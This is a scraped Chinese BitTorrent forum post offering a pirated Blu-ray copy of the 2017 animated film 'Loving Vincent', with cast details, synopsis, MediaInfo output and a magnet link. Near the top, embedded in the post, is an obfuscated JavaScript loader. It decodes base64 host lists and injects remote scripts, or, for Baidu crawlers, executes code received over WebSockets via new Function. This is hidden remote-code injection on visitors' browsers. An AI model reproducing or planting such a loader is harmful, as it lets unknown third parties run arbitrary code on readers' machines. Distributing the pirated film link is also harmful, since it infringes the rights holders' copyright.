至爱梵高·星空之谜[双语字幕].Loving.Vincent.2017.BluRay.1080p.x264.DTS-迅雷下载 6.32GB

版主小s 14天前 150

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 至爱梵高·星空之谜 / 至爱梵高 / 致梵高的爱 / 情迷梵高(港) / 梵谷:星夜之谜(台) / 探索梵高的生与死 / 挚爱梵高 / La passion Van Gogh

◎片 名 Loving Vincent

◎年 代 2017

◎产 地 英国 / 波兰

◎类 别 剧情 / 动画 / 传记

◎语 言 英语

◎上映日期 2017-12-08(中国大陆) / 2017-06-12(安锡动画电影节) / 2017-10-13(英国)

◎IMDb链接 https://www.imdb.com/title/tt3262342/

◎豆瓣评分 8.5/10 (203838人评价)

◎豆瓣链接 https://movie.douban.com/subject/25837262/

◎片 长 95分钟

◎导 演 多洛塔·科别拉 Dorota Kobiela (id:1326282)

休·韦尔什曼 Hugh Welchman (id:1306202)

◎编 剧 多洛塔·科别拉 Dorota Kobiela (id:1326282)

休·韦尔什曼 Hugh Welchman (id:1306202)

贾科·丹纳尔 Jacek Dehnel (id:1376201)

◎演 员 道格拉斯·布斯 Douglas Booth (id:1314461)

罗伯特·古拉奇克 Robert Gulaczyk (id:1376200)

埃莉诺·汤姆林森 Eleanor Tomlinson (id:1275043)

杰罗姆·弗林 Jerome Flynn (id:1085544)

西尔莎·罗南 Saoirse Ronan (id:1022004)

海伦·麦克洛瑞 Helen McCrory (id:1025197)

克里斯·奥多德 Chris O'Dowd (id:1031755)

约翰·塞森斯 John Sessions (id:1016745)

艾丹·特纳 Aidan Turner (id:1018162)

詹姆斯·格林尼 James Greene (id:1101177)

比尔·托马斯 Bill Thomas (id:1376205)

马丁·赫德曼 Martin Herdman (id:1376209)

理查德·班克斯 Richard Banks (id:1345266)

霍莉·厄尔 Holly Earl (id:1080556)

西泽瑞·鲁卡斯瑟维克茨 Cezary Lukaszewicz (id:1251631)

伊万·麦克塔格特 Ivan Mactaggart (id:1387588)

休·韦尔什曼 Hugh Welchman (id:1306202)

克林特·曼塞尔 Clint Mansell (id:1014159)

特里斯坦·奥利弗 Tristan Oliver (id:1378497)

卢卡斯·扎尔 Lukasz Zal (id:1338162)

多洛塔·科别拉 Dorota Kobiela (id:1326282)

多洛塔·科别拉 Dorota Kobiela (id:1326282)

◎标 签 艺术 / 传记 / 油画 / 动画 / 美术 / 文艺 / 人生 / 英国

◎简 介

影片用一封无法投递的信件串联起梵高在去世前最后六周里与他生命中最重要的三个人物之间的秘密,带观众穿越回十九世纪末的欧洲,并陪伴梵高走完他最后的人生。影片采用梵高原画作品中的人物原型还原梵高的艺术人生,让观众在享受美得令人窒息的视觉盛宴时,抽丝剥茧地发现隐藏了一个半世纪的秘密。

  1. General

  2. Unique ID : 99843514326334980991029268772297458800 (0x4B1D29517880C38D1E661FC24E694470)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 6.31 GiB

  7. Duration : 1 h 34 min

  8. Overall bit rate : 9 543 kb/s

  9. Encoded date : UTC 2021-07-11 06:18:21

  10. Writing application : mkvmerge v55.0.0 ('Waiting For Space') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 1 h 34 min

  22. Bit rate : 8 300 kb/s

  23. Width : 1 480 pixels

  24. Height : 1 080 pixels

  25. Display aspect ratio : 1.370

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.217

  33. Stream size : 5.49 GiB (87%)

  34. Writing library : x264 core 161 r3048+53M 0749c36 t_mod_New [(8 & 10)[email protected] X86_64]

  35. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=34 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=19.0000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. ID in the original source medium : 4352 (0x1100)

  42. Format : DTS

  43. Format/Info : Digital Theater Systems

  44. Codec ID : A_DTS

  45. Duration : 1 h 34 min

  46. Bit rate mode : Constant

  47. Bit rate : 1 152 kb/s

  48. Channel(s) : 6 channels

  49. Channel layout : C L R Ls Rs LFE

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 93.750 FPS (512 SPF)

  52. Bit depth : 24 bits

  53. Compression mode : Lossy

  54. Stream size : 780 MiB (12%)

  55. Default : Yes

  56. Forced : No

  57. Original source medium : Blu-ray


  58. Text #1

  59. ID : 3

  60. ID in the original source medium : 4609 (0x1201)

  61. Format : PGS

  62. Muxing mode : zlib

  63. Codec ID : S_HDMV/PGS

  64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration : 1 h 27 min

  66. Bit rate : 56.5 kb/s

  67. Count of elements : 1741

  68. Stream size : 35.2 MiB (1%)

  69. Title : chs&eng

  70. Language : Chinese

  71. Default : Yes

  72. Forced : No

  73. Original source medium : Blu-ray


  74. Text #2

  75. ID : 4

  76. ID in the original source medium : 4610 (0x1202)

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 1 h 27 min

  82. Bit rate : 57.0 kb/s

  83. Count of elements : 1741

  84. Stream size : 35.5 MiB (1%)

  85. Title : cht&eng

  86. Language : Chinese

  87. Default : No

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Text #3

  91. ID : 5

  92. ID in the original source medium : 4611 (0x1203)

  93. Format : PGS

  94. Muxing mode : zlib

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 1 h 27 min

  98. Bit rate : 32.2 kb/s

  99. Count of elements : 1741

  100. Stream size : 20.1 MiB (0%)

  101. Title : chs

  102. Language : Chinese

  103. Default : No

  104. Forced : No

  105. Original source medium : Blu-ray


  106. Text #4

  107. ID : 6

  108. ID in the original source medium : 4612 (0x1204)

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 27 min

  114. Bit rate : 32.7 kb/s

  115. Count of elements : 1741

  116. Stream size : 20.4 MiB (0%)

  117. Title : cht

  118. Language : Chinese

  119. Default : No

  120. Forced : No

  121. Original source medium : Blu-ray


  122. Text #5

  123. ID : 7

  124. ID in the original source medium : 4608 (0x1200)

  125. Format : PGS

  126. Muxing mode : zlib

  127. Codec ID : S_HDMV/PGS

  128. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  129. Duration : 1 h 32 min

  130. Bit rate : 37.5 kb/s

  131. Count of elements : 1938

  132. Stream size : 24.9 MiB (0%)

  133. Language : English

  134. Default : No

  135. Forced : No

  136. Original source medium : Blu-ray


  137. Menu

  138. 00:00:00.000 : en:第 01 章

  139. 00:10:28.002 : en:第 02 章

  140. 00:22:59.044 : en:第 03 章

  141. 00:38:05.408 : en:第 04 章

  142. 00:48:47.966 : en:第 05 章

  143. 01:03:16.959 : en:第 06 章

  144. 01:14:26.920 : en:第 07 章

  145. 01:28:26.884 : en:第 08 章


TAGS 动作 剧情 传记

磁力链:
  • magnet:?xt=urn:btih:EFC088CEFC4547894EDD68053E6EA44284051696
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回